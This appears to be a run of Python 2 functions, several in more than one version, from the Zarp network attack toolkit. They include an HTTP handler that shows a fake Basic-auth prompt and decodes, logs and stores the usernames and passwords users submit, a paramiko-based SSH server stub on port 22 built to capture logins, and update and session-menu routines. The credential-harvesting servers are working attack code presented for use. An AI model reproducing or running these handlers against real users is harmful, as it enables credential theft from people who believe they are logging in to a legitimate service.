def do_GET(self): try: # go away if self.path == '/favicon.ico': return # serve user-specified page if not self.context['root'] is None and util.does_file_exist(self.context['root']): self.send_headers() fle = open(self.context['root'], 'rb') self.wfile.write(fle.read()) fle.close() return # else serve up the authentication page to collect credentials auth_header = self.headers.getheader('Authorization') if auth_header is None: self.send_auth_headers() elif auth_header.split(' ')[1] == base64.b64encode('ballast:security'): self.send_headers() self.wfile.write('Authenticated :)') elif not auth_header is None: if self.context['log_data']: self.context['log_file'].write(base64.b64decode(auth_header.split(' ')[1]) + '\n') if self.context['dump']: util.Msg('Collected: %s'%base64.b64decode(auth_header.split(' ')[1])) self.send_auth_headers() else: self.send_auth_headers() except Exception, j: if j.errono == 32: # connection closed prematurely return util.Error('Error: %s'%j) return
def update(): """Run update routine """ if not util.does_file_exist('./.git/config'): util.Error( 'Not a git repo; please checkout from Github with \n\tgit clone http://github.com/hatRiot/zarp.git\n to update.' ) else: util.Msg('Updating Zarp...') ret = util.init_app('git branch -a | grep \'* dev\'', True) if len(ret) > 3: util.Error( 'You appear to be on the dev branch. Please switch off dev to update.' ) return ret = util.init_app('git pull git://github.com/hatRiot/zarp.git HEAD', True) if 'Already up-to-date' in ret: util.Msg('Zarp already up to date.') elif 'fatal' in ret: util.Error('Error updating Zarp: %s' % ret) else: from util import version util.Msg('Zarp updated to version %s' % (version()))
def menu(): """Driver for the session management menu """ while True: stream.dump_sessions() choice = util.print_menu(session_menu) if choice == 0: break elif choice == 1: (module, number) = stream.get_session_input() if not module is None: stream.stop_session(module, number) elif choice == 2: (module, number) = stream.get_session_input() if not module is None: stream.view_session(module, number) elif choice == 3: try: display = color.B_YELLOW + '[' + color.B_GREEN + '!' + color.B_YELLOW + \ '] Enter file to log to' + color.B_WHITE + ' > ' + color.END file_path = raw_input(display) if file_path is None: return if util.does_file_exist(file_path) or path.islink(file_path): util.Error('File already exists.') return (module, number) = stream.get_session_input() if not module is None: display = color.B_YELLOW + '[' + color.B_GREEN + '!' + color.B_YELLOW + \ '] Log output from %s session %s to %s. Is this correct? ' + \ color.B_GREEN + '[' + color.B_YELLOW + 'Y' + color.B_GREEN + \ '/' + color.B_YELLOW + 'n' + color.B_GREEN + '] ' + \ color.B_WHITE + '> ' + color.END tmp = raw_input(display % (module, number, file_path)) if 'n' in tmp.lower(): return stream.toggle_log(module, number, file_path, True) except KeyboardInterrupt: return except Exception: util.Error('Error logging to given file') return elif choice == 4: (module, number) = stream.get_session_input() if not module is None: stream.toggle_log(module, number) elif choice == -1: pass else: system('clear')
def menu(): while True: stream.dump_sessions() choice = util.print_menu(session_menu) if choice == 0: break elif choice == 1: module, number = get_session_input() if not module is None: stream.stop_session(string.lower(module), int(number)) else: return elif choice == 2: module, number = get_session_input() if not module is None: stream.view_session(string.lower(module), int(number)) else: return elif choice == 3: print '[!] Enter file to log to: ' file_path = raw_input('> ') if file_path is None: return if util.does_file_exist(file_path): util.Error('File already exists.') return util.Msg('Module must be a sniffer or valid logging module.') module = None (module, number) = get_session_input() try: if not module is None: tmp = raw_input('[!] Log output from %s session %s to %s. Is this correct? '% (module,number,file_path)) else: return except Exception, j: util.Error('Error logging to given file') return if tmp == 'n': return stream.start_log_session(module, int(number), file_path) elif choice == 4: (module, number) = get_session_input() if not module is None: stream.stop_log_session(module, int(number))
def menu(): """Driver for the session management menu """ while True: stream.dump_sessions() choice = util.print_menu(session_menu) if choice == 0: break elif choice == 1: (module, number) = stream.get_session_input() if not module is None: stream.stop_session(module, number) elif choice == 2: (module, number) = stream.get_session_input() if not module is None: stream.view_session(module, number) elif choice == 3: print '[!] Enter file to log to: ' file_path = raw_input('> ') if file_path is None: return if util.does_file_exist(file_path) or path.islink(file_path): util.Error('File already exists.') return util.Msg('Module must be a sniffer or valid logging module.') (module, number) = stream.get_session_input() try: if not module is None: tmp = raw_input('[!] Log output from %s session %s to %s.' 'Is this correct? [Y/n]' % (module, number, file_path)) if 'n' in tmp.lower(): return stream.toggle_log(module, number, file_path, True) except Exception: util.Error('Error logging to given file') return elif choice == 4: (module, number) = stream.get_session_input() if not module is None: stream.toggle_log(module, number) elif choice == -1: pass else: system('clear')
def update(): if not util.does_file_exist('./.git/config'): util.Error('Not a git repo; please checkout from Github with \n\tgit clone http://github.com/hatRiot/zarp.git\n to update.') else: util.Msg('Updating Zarp...') ret = util.init_app('git branch -a | grep \'* dev\'', True) if len(ret) > 3: util.Error('You appear to be on the dev branch. Please switch off dev to update.') return ret = util.init_app('git pull git://github.com/hatRiot/zarp.git HEAD', True) if 'Already up-to-date' in ret: util.Msg('Zarp already up to date.') elif 'fatal' in ret: util.Error('Error updating Zarp: %s'%ret) else: from util import version util.Msg('Zarp updated to version %s'%(version()))
def do_GET(self): """Handle GET""" try: # go away if self.path == '/favicon.ico': return # serve user-specified page if not self.context['root'] is None and util.does_file_exist(self.context['root']): self.send_headers() fle = open(self.context['root'], 'rb') self.wfile.write(fle.read()) fle.close() return # else serve up the authentication page to collect credentials auth_header = self.headers.getheader('Authorization') if auth_header is None: self.send_auth_headers() elif auth_header.split(' ')[1] == base64.b64encode('ballast:security'): self.send_headers() self.wfile.write('Authenticated :)') elif not auth_header is None: (usr, pswd) = base64.b64decode(auth_header.split(' ')[1]).split(':') self.context['self'].log_msg(\ 'Collected: \033[32m%s:%s\033[33m' % (usr,pswd)) self.context['self']._dbcredentials(usr, pswd, 'local HTTP', self.connection.getpeername()[0]) self.send_auth_headers() else: self.send_auth_headers() except Exception, j: if j.errono == 32: # connection closed prematurely return util.Error('Error: %s' % j) return
def update(): """Run update routine """ if not util.does_file_exist("./.git/config"): util.Error( "Not a git repo; please checkout from Github with \n\t" "git clone http://github.com/hatRiot/zarp.git\n to update." ) else: util.Msg("Updating Zarp...") ret = util.init_app("git branch -a | grep '* dev'", True) if len(ret) > 3: util.Error("You appear to be on the dev branch." "Please switch off dev to update.") return ret = util.init_app("git pull git://github.com/hatRiot/zarp.git HEAD") if "Already up-to-date" in ret: util.Msg("Zarp already up to date.") elif "fatal" in ret: util.Error("Error updating Zarp: %s" % ret) else: from util import version util.Msg("Zarp updated to version %s" % (version()))
def initialize(self): priv_key = self.config['priv_key'].value try: # try importing here so we can catch it right away import paramiko except ImportError: util.Error('Paramiko libraries required for this module.') return level = getattr(paramiko.common, 'CRITICAL') paramiko.common.logging.basicConfig(level=level) # if the user did not specify a key, generate one if priv_key is None: if not util.check_program('openssl'): util.Error('OpenSSL required to generate cert/key files.') return if not util.does_file_exist('./privkey.key'): util.debug('Generating RSA private key...') util.init_app('openssl genrsa -out privkey.key 2048') util.debug('privkey.key was generated.') priv_key = self.config['priv_key'].value = './privkey.key' try: server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True) server_socket.settimeout(3) server_socket.bind(('0.0.0.0', self.config['port'].value)) server_socket.listen(1) self.running = True while self.running: try: con, addr = server_socket.accept() except KeyboardInterrupt: return except: # timeout continue pkey = paramiko.RSAKey.from_private_key_file(priv_key) transport = paramiko.Transport(con) transport.add_server_key(pkey) transport.set_subsystem_handler('handler', paramiko.SFTPServer, SSHHandler) context = {'dump': self.dump, 'log_data': self.log_data, 'log_file': self.log_file} server = SSHStub(context) try: transport.start_server(server=server) transport.accept() while transport.is_active(): sleep(1) except socket.error as j: if j.errno == 104: # just means we've got a broken pipe, or # the peer dropped unexpectedly continue else: raise Exception() except IOError: util.Error('There was an error reading the keyfile.') return False except EOFError: # thrown when we dont get the key correctly, or # remote host gets mad because the key changed continue except: raise Exception() except KeyboardInterrupt: pass except Exception as j: util.Error('Error with server: %s' % j) finally: self.running = False self.cleanup()
def initialize(self): try: # try importing here so we can catch it right away import paramiko except ImportError: util.Error('Paramiko libraries required for this module.') return level = getattr(paramiko.common, 'CRITICAL') paramiko.common.logging.basicConfig(level=level) # if the user did not specify a key, generate one if self.priv_key is None: if not util.check_program('openssl'): util.Error('OpenSSL required to generate cert/key files.') return if not util.does_file_exist('./privkey.key'): util.debug('Generating RSA private key...') tmp = util.init_app('openssl genrsa -out privkey.key 2048', True) util.debug('privkey.key was generated.') self.priv_key = './privkey.key' try: server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True) server_socket.settimeout(3) server_socket.bind(('0.0.0.0', 22)) server_socket.listen(1) self.running = True while self.running: try: con, addr = server_socket.accept() except KeyboardInterrupt: return except: # timeout continue pkey = paramiko.RSAKey.from_private_key_file(self.priv_key) transport = paramiko.Transport(con) transport.add_server_key(pkey) transport.set_subsystem_handler('handler', paramiko.SFTPServer, SSHHandler) context = { 'dump': self.dump, 'log_data': self.log_data, 'log_file': self.log_file } server = SSHStub(context) try: transport.start_server(server=server) channel = transport.accept() while transport.is_active(): sleep(1) except socket.error as j: if j.errno == 104: # just means we've got a broken pipe, or # the peer dropped unexpectedly continue else: raise Exception() except IOError: util.Error('There was an error reading the keyfile.') return False except EOFError: # thrown when we dont get the key correctly, or # remote host gets mad because the key changed continue except: raise Exception() except KeyboardInterrupt: pass except Exception as j: util.Error('Error with server: %s' % j) finally: self.running = False self.cleanup()